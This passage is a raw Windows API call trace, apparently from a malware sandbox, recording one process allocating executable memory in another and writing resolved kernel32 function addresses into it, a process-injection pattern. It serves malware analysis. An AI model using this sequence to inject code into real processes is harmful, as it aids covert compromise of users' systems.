	[0240.058] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.058] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f264, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.059] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.059] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.059] lstrlenA (lpString="HeapFree") returned 8
	[0240.059] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.059] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bccba*, nSize=0x9, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bccba*, lpNumberOfBytesWritten=0x12858c*=0x9) returned 1
	[0240.059] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.059] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.060] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.060] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.060] ResetEvent (hEvent=0x680) returned 1
	[0240.060] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.061] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.061] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.061] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.061] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.061] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f268, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.061] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.062] lstrlenA (lpString="HeapReAlloc") returned 11
	[0240.062] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.062] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bccc6*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bccc6*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0240.062] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.062] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.062] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.063] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.063] ResetEvent (hEvent=0x680) returned 1
	[0240.063] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.063] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.063] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.063] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.064] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.064] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f26c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.064] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.064] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.064] lstrlenA (lpString="InitializeCriticalSection") returned 25
	[0240.064] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.064] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bccd4*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bccd4*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
	[0240.065] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.065] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.065] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.065] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.066] ResetEvent (hEvent=0x680) returned 1
	[0240.066] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.066] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.066] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.066] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.066] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.066] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f270, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.067] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.067] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.067] lstrlenA (lpString="IsDBCSLeadByteEx") returned 16
	[0240.067] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.067] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bccf0*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bccf0*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0240.068] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.068] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.068] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.068] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.069] ResetEvent (hEvent=0x680) returned 1
	[0240.069] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.069] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.069] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.069] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.069] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f274, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.070] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.071] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.071] lstrlenA (lpString="LeaveCriticalSection") returned 20
	[0240.071] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.071] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd04*, nSize=0x15, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd04*, lpNumberOfBytesWritten=0x12858c*=0x15) returned 1
	[0240.071] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.071] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.072] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.072] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.072] ResetEvent (hEvent=0x680) returned 1
	[0240.072] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.073] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.073] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.073] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.073] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.073] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f278, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.074] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.074] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.074] lstrlenA (lpString="MultiByteToWideChar") returned 19
	[0240.074] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.074] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd1c*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd1c*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0240.074] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.074] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.075] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.075] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.075] ResetEvent (hEvent=0x680) returned 1
	[0240.075] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.076] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.076] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.076] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.076] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.076] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f27c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.076] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.077] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.077] lstrlenA (lpString="QueryPerformanceCounter") returned 23
	[0240.077] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.077] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd32*, nSize=0x18, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd32*, lpNumberOfBytesWritten=0x12858c*=0x18) returned 1
	[0240.077] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.077] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.077] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.078] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.078] ResetEvent (hEvent=0x680) returned 1
	[0240.078] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.132] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.132] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.132] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.132] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f280, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.133] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.133] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.133] lstrlenA (lpString="SetCurrentDirectoryA") returned 20
	[0240.133] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.133] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd4c*, nSize=0x15, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd4c*, lpNumberOfBytesWritten=0x12858c*=0x15) returned 1
	[0240.133] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.133] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.134] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.134] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.134] ResetEvent (hEvent=0x680) returned 1
	[0240.134] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.135] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.135] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.135] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.135] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f284, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.135] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.136] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.136] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27
	[0240.136] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.136] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd64*, nSize=0x1c, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd64*, lpNumberOfBytesWritten=0x12858c*=0x1c) returned 1
	[0240.136] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.136] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.136] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.137] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.137] ResetEvent (hEvent=0x680) returned 1
	[0240.137] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.137] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.138] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.138] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.138] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f288, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.138] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.138] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.138] lstrlenA (lpString="Sleep") returned 5
	[0240.138] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.139] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd82*, nSize=0x6, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd82*, lpNumberOfBytesWritten=0x12858c*=0x6) returned 1
	[0240.139] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.139] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.139] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.140] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.140] ResetEvent (hEvent=0x680) returned 1
	[0240.140] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.140] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.140] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.140] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.140] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.140] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f28c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.141] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.141] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.141] lstrlenA (lpString="TerminateProcess") returned 16
	[0240.141] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.141] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcd8a*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcd8a*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0240.142] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
